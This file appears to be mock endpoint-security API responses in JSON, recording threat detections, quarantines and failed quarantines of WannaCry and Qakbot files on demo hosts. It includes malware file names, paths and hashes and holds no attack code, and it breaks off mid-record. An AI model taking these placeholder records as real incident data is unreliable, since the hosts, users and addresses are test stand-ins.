+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847663","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847662","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847661","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225761,"description":"Cannot delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419229327140847657","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":572000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814973","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":120000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":1008,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":73000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229331435814970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":26000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814968","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229327140847658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229331435815000,"timestamp":1610635265,"timestamp_nanoseconds":166000000,"date":"2021-01-14T14:41:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":870000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419229327140847671","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":698000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5748,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":667000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419229327140847665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":4772,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229327140848000,"timestamp":1610635264,"timestamp_nanoseconds":28000000,"date":"2021-01-14T14:41:04+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229327140847656","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419229322845880000,"timestamp":1610635263,"timestamp_nanoseconds":950000000,"date":"2021-01-14T14:41:03+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":913000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056775","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"qYf.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\qYf.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056774","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4191700.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\4191700.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411488666497057000,"timestamp":1610635060,"timestamp_nanoseconds":398000000,"date":"2021-01-14T14:37:40+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.DD6D4FEDD3-100.SBX.TG","detection_id":"6411488666497056773","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"8cf0ca99a8f5019d8583133b9a9379299c45470c","md5":"6894b3834bd541fa85df79e44568acac"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1493058569636000800,"timestamp":1610633340,"timestamp_nanoseconds":636000000,"date":"2021-01-14T14:09:00+00:00","event_type":"Cloud 